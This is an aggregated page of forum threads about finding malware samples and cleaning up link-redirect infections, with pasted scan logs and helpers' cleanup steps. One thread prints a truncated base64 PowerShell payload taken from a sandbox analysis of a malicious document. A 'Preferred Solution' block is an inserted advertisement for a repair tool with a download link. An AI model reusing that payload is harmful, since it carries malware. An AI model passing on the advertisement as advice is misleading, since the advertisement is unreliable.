Over 1 million tech questions and answers.

Where do you get your malware & link samples?

Q: Where do you get your malware & link samples?

I know the typical sites like vx vault and virus sign, but I want to expand my list further. Where else can I get malware samples

RELEVANCY SCORE 200
Preferred Solution: Where do you get your malware & link samples?

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: Where do you get your malware & link samples?

You can try malc0de database

Read other 1 answers
RELEVANCY SCORE 63.6

I can't find MBSA 2.0 Scripting Samples. In all resources there only one link for download Samples, but it's dead.

link to scripting samples: https://www.microsoft.com/downloads/details.aspx?FamilyId=3B64AC19-3C9E-480E-B0B3-6B87F2EE9042
And i found it in: https://technet.microsoft.com/en-us/security/cc184924.aspx

Did anyone has them and can share?

Read other answers
RELEVANCY SCORE 63.2

I am using the latest 2.3 MBSA but the scripting samples which include the necessary rollup.js to summary the reporting appears to no longer be available on any listed link or search in the Microsoft support pages.  Does anyone know the status on these
or how we can go about getting it.

Read other answers
RELEVANCY SCORE 58.4

Any idea, what are the passwords for malware samples on those webpages?

Free Automated Malware Analysis Service - powered by VxStream Sandbox

Malwr - Malware Analysis by Cuckoo Sandbox
 

A:What is the password for malware samples?

Malware samples downloaded from Malwr for example, are in .bin format if I remember well.
Just rename them to .exe, or in the native format as from the report (.js, doc, etc).
Which password do you mean?
 

Read other 1 answers
RELEVANCY SCORE 58.4

Hi Everyone,

I'm a Network Engineer for an IT consulting company in NYC. Recently we've seen the XP/Win7/Vista Antivirus 2012 malware pop up on many of our clients PC's. Most of the PC's I've seen infected are running SEP, so obviously SEP isn't doing anything to stop it.

I'm currently looking for Samples of this Virus that we can use to test several anti malware programs. I'm Currently looking at these three alternatives, to run along side SEP: http://www.makeuseof.com/tag/3-free-realtime-malware-protection-removal-tools/. My supervisor is also interested in learning what the end user is doing to become infected with this virus. As far as I know, there are many infection methods, ranging from email attachments, to website popups that trick the user into running the malware.

Does anyone know of a current scam site that would infect a computer with this virus? Or does anyone know where I can download the actual executable?

If you link a file or site here, please don't make the link clickable, as we don't want people accidently clicking the link.

A:Where to find Samples of Malware?

Check your PM

Good luck

Read other 6 answers
RELEVANCY SCORE 57.2

i need a website from which you are able to download free and the latest Malware samples from so that i can test various amounts of anti viruses, I have already used virussign.com and offensivecomputing.com which is the worst out of the two as I signed up for it about a week ago and yet my account still has not been activated...plz helpEdit: Moved from the "Virus, Trojan, Spyware, and Malware Removal Logs" forumRoger

A:What Website provides free and the latest Malware Samples?

Hi,Bleeping Computer is in the Malware Removal business and we do not encourage our members to go looking for Malware. However if you are still interested the best suggestion we can make is what has been said previously by Grinler our site owner:Warez and crack sites are a good source and should only be used from a virtual machine. That's the best information and most specific information we can provide.Thank You for Your understanding.Roger

Read other 1 answers
RELEVANCY SCORE 56

Google has rolled out a feature that provides webmasters of compromised sites with samples of malicious code and other detailed information to help them clean up.



Google shares malware samples with hacked site admins ? The Register

Read other answers
RELEVANCY SCORE 55.2

The malware was analyzed here:
Free Automated Malware Analysis Service - powered by VxStream Sandbox - Viewing online file analysis results for 'EDGAR_Rules_2017.docx'
.
So, I looked at 'Extracted Strings' section of the above analysis and found interesting string:

Code:
$data=[System.Convert]::FromBase64String('H4sIAAAAAAAEANVZeZObSJb/35+CdTiiXEtXCYEOsMMRIy6BBIhDSEhdHV6O5BKXuITw9HfflFRlu7vtHs/szM5uhSKEMl+++/3yPeqNAco2cgGTewD5gPzl7tUbz67tDz8b56oG6SOTZy0o61/evePLPKXtCkxGRl1GWfD2ThhV4uz2x81WQxsQqm3Q0iDDyG7si80oPXHoAk8apdK73FayfRg409M8CtUzzVTzSLeYVI1H07iipLOGLYRxMB0Sm2azCKlF3GTZlCzKWpicUM9a1uyAWNbWMuP0WDG1fEOq7SaZsmk4IdocW1Aj30PRPikaiahRsB9P7MVOGBKYsT2OiamVUyIlAzznKHlRZCSnMFwYDfAB1q20kjztD9OFQFjixBqSOC3LDTHUCCpoqMlidcoJzJZTVWCLbTTLDj1vpel2efS34pjBGhWLwDqvBVeUBxLFDYCszyV/wg2cjabTx12SqipqrHHx0EvuSEz6Mk9W7jKurQ3L5dvplCeLHV7wSmYd1ns8t0fnsOLCVb+KRd7RRsJgMgolI+I3asPjeh5t14vsHPmaRubiihuR/AxVzFpx6hO69W1Up5gJtj5l1ITfk/rJZ5UpOt67Uj/ZxLtwsq5obj6arZWqGXgHgzmw5FxOYmhE30ZbPzdHPYd2anQIz2DUimrhGamXW2hBD7Sxy62M0j/G3HJoTfNDTx9B3HGLYOurzYCvDSpwWXxa4cuBx6KRvG8TJtVr3B5xsj/sGbTzTL0tup1FsOMZT0W+6KrkIKqcODuiacxkHemRCnUUcpXs9hqmLTPe2eSGX0WKNMeW1EGcDCyROSftjl+N8Z7zllhySAJNK42IOWozrO4Oi6635vv5rI6loxjgnjQ1T/ukHRybbiRKrucbHG80iu/Wykpejo5cyNfqcmat1LW0QKlz3WmFRmWn6YI+5dyR5bxwqwfKMbAwbqP0lngSdntUmjKCMlR7SmAsq/dEd+VOxkx/mlJdyVUB75bz8ZDtAEsP2wNRrl36bBxjfCLv87iPhdBAPYFGaXEYawcRHZ7lLsOEwZpnR3FNsOfKI6EZfbzFG2u7DXZFZuM1r3OWKTOrfLFYW9UitkgD96Ik3VEnzwXleG1ps2yhNqZtbHNQh+V0O1wH5jwtUY1nonVeOetRU8wNU... Read more

Read other answers
RELEVANCY SCORE 46.8

Have been using Win 7 Ultimate x64 for quite a while but tonight ran into a small problem. I like to keep the titles for links very short and want to rename "Malwarebytes Anti-Malware" (I am a registered, paid user) to simply "Malwarebytes". I am listed as an Administrator and I used LockHunter to unlock the file but it still does not allow me to shorten the description. When I shorten the name and hit OK I am told "You'll need to provide administrator permission to rename this file" Since I am the administrator on this machine I do not know what to do. Continuing does nothing. Anyone have any suggestions? /* Philip */

A:Changing File Decription for link to Malware Bytes Anti-Malware

Not sure but I think Malwarebytes is trying to protect itself.
That is one of the first things a virus would try to do is change the name/link and get it out of the infection way.

I can change the name of the desktop Icon to MBAM.

Read other 9 answers
RELEVANCY SCORE 46.8

Please reopen the case:http://www.bleepingcomputer.com/forums/t/278792/infected-by-various-malware-help/ Original message, posted on December 14, 2009:My computer is infected by malwares. Earlier I got help from bleepingcomputer staff under topic malware and has tried to use these software to clean my infected computer but still to no avail. The volunteer who helped me earlier asked me to use hijackthis and paste the logs on this forum.Malwarebytes Anti-Malware (v1.41)TFC by Old TimerKaspersky Virus Removal ToolEset Online Antiivirus Scanner.Kaspersky Online Virus Scanner.Sophos Anti-rootkitNorman Malware CleanerThe problems are:- When I use Internet Explorer or Mozilla, sometimes another window open automatically that mentions google hiring, websurvey, etc- When I use search engine to find something, I could not click the link to bring me to the shown result that I want, instead it brings me to an unfamiliar site. I have to copy and paste the web address to open it. If I click the link, sometimes it brings me to an anti-virus ad that force me to download the software (it would not allow me to close the browser) so I have to end the whole internet session forcefully.----------------------------------------------------------------------------------------------------------------------------------------------LOGFILE IS ATTACHEDLogfile of random's system information tool 1.06 (written by random/random)Run by USER1 at 2010-01-07 19:27:45Microsoft Windows XP Professional Service Pa... Read more

A:Closed TopicStart new topic > Infected by various malware. Help !!, Malware pop ups and could not open link from se...

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.Please download OTL from following mirror:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Push the button.Two reports will open, copy and paste them in a reply here:OTL.txt <-- Will be openedExtra.txt <-- Will be minimizedIn the upper right hand cor... Read more

Read other 17 answers
RELEVANCY SCORE 41.6

I keep receiving this redirects to shopzilla, Edmunds.com,etc in my firefox and chrome browsers.I tried using spybot,TDSS,adaware to scan but found nothing.GMER log is an attachment since it was too big to put in the thread.

Hijackthis.log:

Code:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:25:35 AM, on 12/25/2013
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v10.0 (10.00.9200.16618)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Windows Sidebar\sidebar.exe
C:\Users\JX\Documents\Datum Memory Booster\memBoost.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
C:\Program Files (x86)\EaseUS\TrayPopup\TrayTipAgent.exe
C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Applicat... Read more

A:Link redirect malware

Read other 10 answers
RELEVANCY SCORE 41.6

help me analysis link :http://xn--facesistem-923pa4140mna.tk/
me infected virus in link on

A:link malware of china

Does not have a good ratinghttp://www.webutation.net/go/review/f%E7%AE%98%E7%AE%97ace%E4%BA%BA%E4%BA%BAsistem.tkScan the computerMiniToolBoxPlease download MiniToolBox, save it to your desktop and run it.Checkmark the following checkboxes:Flush DNSReport IE Proxy SettingsReset IE Proxy SettingsReport FF Proxy SettingsReset FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Users, Partitions and Memory size.Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run. Note: When using "Reset FF Proxy Settings" option Firefox should be closed.>>>Please Download TDSSkiller Launch it. Click on change parameters-Select TDLFS file system Click on "Scan".Please post the LOG report(log file should be in your C drive) Do not change the default options on scan results.ADW CleanerPlease download AdwCleaner by Xplode onto your desktop.Close all open programs and internet browsers.Double click on adwcleaner.exe to run the tool.Click on Delete.Confirm each time with Ok.You will be prompted to restart your computer. A text file will open after the restart.Please post the contents of that logfile with your next reply.You can find the logfile at C:\AdwCleaner[S1].txt as well.>>>>I'd like us to scan your machine with ESET OnlineScanHold down Control and click on this link to open ESET OnlineScan in a new w... Read more

Read other 1 answers
RELEVANCY SCORE 41.6

Hi all, I am having an issue with some malware. When I type in a link in google chrome or firefox, click on a link (unless opening in a new tab), I am often redirected to other websites.

I've tried ESET's online scanner, Crap Cleaner, Malwarebyte's Anti-Malware, and SUPERAntiSpyware.

I am out of ideas. I would love someone's help if you have time. I've reverted back to a backup I had from over a year ago when I did not have this problem.

Here is my logfile:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:32:02 PM, on 8/23/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\windows\system32\taskhost.exe
C:\windows\system32\Dwm.exe
C:\windows\Explorer.EXE
C:\PROGRA~1\McAfee.com\Agent\mcagent.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\AnyPC Client\APLangApp.exe
C:\windows\system32\igfxsrvc.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe
C:\Users\joshua\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\joshua\AppData\Local&... Read more

A:Redirecting link malware

EDIT: But when I reverted back to the old backup I'm still having the problem.

Read other 28 answers
RELEVANCY SCORE 41.6

Hello,
I am a first time user. While visiting my in-laws, they asked me to help them with a computer problem. A few months ago, they opened a malware email attachment, somcething about 'problem with your UPS shipment' or the like, and since then links on google and other search engines are redirected to letmehelpu.com, ahomecareer1.info, or answero.net, etc. There may be others but these are what I have seen so far.

Their Win7 x64 machine was already running Microsoft Security Essentials, which apparently failed to find this malware, although as I type I am also running a full scan to see if MSE can fix this.

They never use Firefox, though installed on their machine. When I use firefox on their machine, it does not seem to be affected, at least as of yet.

Below is pasted into from DDS.txt.
Many thanks!
gironense

.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by Bergmoosers at 17:01:58 on 2012-05-10
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.2815.977 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k Dco... Read more

A:Malware link redirection

Hi,Please do the following:Please download aswMBR.exe and save it to your desktop.
Double click aswMBR.exe to start the tool. When asked if you want to download Avast's virus definitions please select Yes.
Click Scan

Upon completion of the scan, click Save log and save it to your desktop, and post that log in your next reply for review. Note - do NOT attempt any Fix yet.
You will also notice another file created on the desktop named MBR.dat. Right click that file and select Send To>Compressed (zipped) file. Attach that zipped file in your next reply as well.

Read other 20 answers
RELEVANCY SCORE 41.6

Hello All.I am new to the forum so I hope I post this correctly.I seem to have the Yaho/Google redirect virus or malware. I was able to download and run DDR and create the log files from those. I was also able to download GMER. However each time I have tried to run it, either my computer crashes or the program closes due to an error. The first time I ran it, I got a Blue Screen crash. The 2nd time the program got stuck in the C:\Windows\System32\LEXPPS.exe section. I rebooted my computer to safe-mode and tried a third time but the program just failed.I have also been getting periodic Svchost.exe error messages.Your help would be greatly appreciated. Here is my DDR log information:DDS (Ver_10-03-17.01) - NTFSx86 Run by admin at 3:02:40.77 on Sat 07/24/2010Internet Explorer: 8.0.6001.18828 BrowserJavaVersion: 1.6.0_07Microsoft? Windows Vista? Home Basic 6.0.6001.1.1252.1.1033.18.895.252 [GMT -6:00]AV: Symantec AntiVirus *On-access scanning enabled* (Updated) {FB06448E-52B8-493A-90F3-E43226D3305C}SP: Symantec AntiVirus *enabled* (Updated) {6C85A515-B91D-4D2B-AF18-40984A4A8493}SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}SP: SUPERAntiSpyware *enabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}============== Running Processes ===============C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\... Read more

A:Please help with Link Redirect Malware

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.Double click DeFogger to run the tool. The ap... Read more

Read other 8 answers
RELEVANCY SCORE 41.6

Hello,

I am a student studying for my Honours project on the Analysis and Detection of Ransomware. Part of this project is to look at different types of Ransomware samples and record their characteristics and behaviour, as well as come up with preventative techniques to stop/halt the attacks. To be able to do this I have been asked to acquire different live samples. As I am new to the forums, and therefore not a verified member I am unable to access the malware repository. I would very much appreciate if somebody could point in the right direction to get some assistance in this area.
 

Read other answers
RELEVANCY SCORE 41.6

I decided to wrie this in Libre to illustrate a point I was trying to make.
This is written in the default that the writer opens with. [Liberation Serif]
 
This is written in Linux Libertine G
This in Ar Blanca
This in Ar Bonnie
This in Arr decode
This in Arial
Javanese text
Microsoft Jhenge
 
This is turning out to be a bad example I guess the default has finally changed this should be in some type of oriental script. According to the charecters displayed in the drop down box.
 
Oh well I tried. All options are checked off for english 4 days ago this actually typed in Oriental charecters. LOL
 
Well pasteing did not work apparently the editor for this page rendered it different than what was pasted.

A:Samples of text

I have both Libre and Open office suites. If I understand your unspoken question, you're correct, many writing programs change anything entering into its document "blank" into a pre-determined, pre-set, font and size.

Read other 1 answers
RELEVANCY SCORE 41.6

Every time I visit a website that offers mp3 sound samples, I get an error when I try to hear them.

For example, visiting a wind chimes website that offers samples of how their products sound. When I click on the "hear a sample" icon, it takes me to another page, with .mp3 at the end of the address, but I get a little exclamation point inside a yellow triangle in the bottom bar and nothing shows up on the page and I don't get to hear the sound.

When I click on the triangle to find out what the problem is, it tells me, "Error: object expected".

I don't remember having this problem before IE updated itself and changed it's format a few weeks ago. I have no problem hearing music embedded in websites, it's just the sound samples with a .mp3 address.

Any idea what the problem is?
 

A:Why can't I listen to MP3 samples?

What player did you use before? Now?
What version of IE are you using now?
Have you also tried Firefox or another browser?

To play/hear any .mp3 or such sound, a player, such as winamp, realplayer, etc. must be installed, and it must have permission to play such files.

May have to reinstall IE, or at the least check all of the settings.
 

Read other 1 answers
RELEVANCY SCORE 41.2

I received a message from a friend, but the friend did not send me the link. It sent me to google and immediately my antivirus software went off, but was not able to fix it. I get this popup whenever I logon. I have tried, every malware program I know... CClenaer, CWShredder, AdAware, SpyBot, and nothing seems to work. I created a scan using HiJack This, and can only hope someone can interpret what I need to delete.Thanks,

A:Malware after bogus facebook link

Hello Tom Burick and welcome to BleepingComputer!Apollogies for the delay. The forum has been very busy lately. If you are still having problems please download OTViewIt to your desktop.Close all windows and double click OTViewItPlace a tick in the Scan all Users boxIn the File Age drop down box select 90 daysClick Run Scan and let the program run uninterruptedOn completion it will produce two logs on the Desktop, post the OTViewIt.txt and Extras.txt logs in your next post.Thanks,JohannesJohannes

Read other 1 answers
RELEVANCY SCORE 41.2

I'm not exactly sure how I got malware on my computer, but I was originally dealing with one of those issues where a "fake" anti-virus software was popping up on the screen telling me I needed to purchase something because I had viruses. It also would not allow me to open certain programs -- especially task manager.

Re-starting in "safe mode" and using malwarebytes, I was able to delete the trojans and everything seemed to be ok.

When using Google, however, all my links were being hi-jacked. I could still type things into search browser and get the proper links -- but they always sent me to a series of sketchy webpages.

I haven't been able to identify where/what the remaining malware is -- any help would be greatly appreciated.

Here is the hijackthis log:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:17:32 PM, on 9/5/2011
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\USB Camera2\VM332_STI.EXE
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Fi... Read more

A:Malware - Browser Link Hijacking

Read other 16 answers
RELEVANCY SCORE 41.2

I would love to post HT an HT log file and a GMER log file, but unfortunately this thing disables it every time I try to run it. It also disabled and essentially uninstalled my Avira AV, and placed a shame AV that says Avira Enhanced Mode, or something like that, and makes my computer think it is still running Avira. It also disabled my Malwarebytes and I can't run it either. I also tried Spydoctor which it disabled. Spybot ran, but it won't fix it. It killed TDSSkiller. I did get DDS to run and have those files.

My daughter got a chat message on facebook from two different friend last night saying she had found a video about her on youtube. She (unfortunately) clicked the link, but no video opened. She then got on my face book and alas, I had the same chat message, which she clicked on (AGAIN!). Now any security program I try to run gets disabled. It erased all my restore points. My browser get hijacked if I search for anything. (Although, interestingly, if I type in the direct address it will go there. GMER did indicate rootkit activity before it was killed. Now, anytime I try to open one of the security programs it tells me access is denied.

Do I have any hope of cleaning this up myself? The semester starts at university tomorrow and I'm taking 12 hours online. Can't exactly do it without a computer!
Angela

Anyway, I will start with what I can get:
Tech Support Guy System Info Utility version 1.0.0.1
OS Version: Microsoft Windows XP Professional, Ser... Read more

Read other answers
RELEVANCY SCORE 41.2

Hi all -Just trying to get some help fixing my computer. I've run a malware detection scan that caught some of the problems and made the computer better, but I'm still having lingering issues, such as redirection. Before I ran the scan (I used MalwareBytes), I had the blue screen of death a couple of times and was having a lot of redirection issues. I also wasn't able to install AVG - it told me there was a setup error - which I think may have been because of the malware. Before the MalwareBytes scan, I wasn't allowed to connect to Google for some time, although most other websites worked. Other times, it was taking me to Happili (if I'm not misspelling that) but also to other random sites. I think one problem among others may have been a 'Backdoor' malware, although I don't know what that means exactly. After the scan, although things are better, I have periodically been been taken to 'Scour' instead of the link I click on after a Google search. As requested, the DDS log is below and I have attached the Attach.txt file. Any help would be greatly appreciated!Thanks so much!Pac--DDS (Ver_10-11-10.01) - NTFSx86 Run by Pac at 9:46:33.27 on Mon 11/15/2010Internet Explorer: 7.0.6002.18005 BrowserJavaVersion: 1.6.0_21Microsoft? Windows Vista? Home Basic 6.0.6002.2.1252.1.1033.18.3061.961 [GMT -5:00]SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}============== Running Processes ===============C: ... Read more

A:Google and Link Redirect Malware

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear Click the Disable button to disable your CD Emulation drivers Click Yes to continue A 'Finished!' message will ap... Read more

Read other 17 answers
RELEVANCY SCORE 41.2

Hello my name is Mike and im seeking some friendly advice and possibly instructions on how to fix this bug.
I use a Toshiba C655 Satellite Laptop.
Yesterday i used MalewareBytes to quickfix it and get my computer back to working order but now the redirection is just telling me it didnt really do to much.

Here is my HijackThis Log from today.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:40:24 AM, on 7/13/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16800)
Boot mode: Normal

Running processes:
C:\Windows\vVX3000.exe
C:\Program Files (x86)\McAfee Security Scan\2.0.181\SSScheduler.exe
C:\Program Files (x86)\Sony\Sony Picture Utility\PMBCore\SPUVolumeWatcher.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\HighjackThis\HiJackThis.exe
C:\windows\SysWOW64\DllHost.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.facebook.co... Read more

A:Possible Malware? Being Redirected from Google every link

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear Click the Disable button to disable your CD Emulation drivers Click Yes to continue A 'Finished!' message will ap... Read more

Read other 4 answers
RELEVANCY SCORE 41.2

All-
On the advice of the WindowsXP moderator, I've moved my plea for help to this forum as he believes the problem may be related to malware.
(The complete thread can be found at
http://forums.techguy.org/virus-other-malware-removal/1051443-help-yet-another-winsock-internet.html)
Here are my two posts giving the problem and some other info.
Following that I have included the scans from HijackThis, DDS, and GMER. The DDS attach.txt file is attached.
Much appreciate any help you can offer.
SLR

(first post)
Can someone please help a frustrated beginner?
After purging my computer of malware (Strong Fortress 2012), I can’t link my computer to the modem (either using Internet Ex. or Firefox Mozilla.) No new hardware has been added. The only event has been the malware infection about ten days ago which seemed to be eliminated. We got rid of it (using Malawarebytes Anti-maleware) and the computer linked to the internet for a few days with no problem. A week ago, however, we tried to link but were blocked. I have also run the Windows Online Defender and it found suspect files which were removed.
The troubleshooting diagnostic on IE comes up with this message:
For WinSock Status:
Error attempting to validate the Winsock base providers: 2
Not all base service provider entries could be found in the winsock catalog. A reset is needed.
Redirecting user to support call
I’ve tried using the “netsch winsock reset” command (and LSPfix, WinSockxpFix, and MicrosoftFixit50203) with n... Read more

Read other answers
RELEVANCY SCORE 41.2

Hi -I got the Antivirus System Pro malware (FakeAlert-IE ?) and used Combofix to clean out most of it per the instructions .. but, I'm still getting link redirects when Googling in IE and Firefox .. I upgraded to IE8 but that didn't help .. Hijackthis log follows -- I'd really apprecite any help -- thanks ! - gLogfile of Trend Micro HijackThis v2.0.2Scan saved at 11:39:53 PM, on 10/28/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Lavasoft\Ad-Aware\aawservice.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Synaptics\SynTP\SynTPLpr.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\Program Files\Dell\Media Experience\PCMService.exeC:\WINDOWS\MXOALDR.EXEC:\PROGRA~1\Maxtor\OneTouch\Utils\OneTouch.exeC:\WINDOWS\System32\DSentry.exeC:\Program Files\Dell AIO Printer A940\dlbabmgr.exeC:\Program Files\Dell\AccessDirect\dadapp.exeC:\Program Files\Common Files\InstallShield\UpdateService\issch.exeC:\Program Files\Com... Read more

A:HijackThis log - malware link redirects .. please help !

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 25 answers
RELEVANCY SCORE 40.8

I have over 500 fonts. I have to delete at least 200 of them.
I know what should NOT be deleted but, is there a way
to print a sample of EVERY font?
Also, when it comes to deleting, should I delete to a zip disk
or just delete?
I have already backed up every font on a CD-RW disk.
Thank you.... missfuffy
 

A:printing samples of every font

You can view and print samples of each font in W2K by going to the C:/Winnt/Fonts folder, (I believe in XP its located in the C:/Windows/Fonts folder.) Just double click on each one to view a sample which you can print by clicking on the print button on the upper right. However, if you have 500 fonts, its probably not worth the time and ink to print all of them. Its probably best just to view them and delete the ones your planning to get rid of by cutting them over onto your zip disk for backup.
 

Read other 2 answers
RELEVANCY SCORE 40.8

Anyone have a workaround? anytime I try to via their webpage for it.

https://www.bitdefender.com/submit/

I can fill out everything but when I select "File" it doesn't give me the option to choose a file.

Using Bitdefender Free.
 

A:How do I submit Samples to Bitdefender?
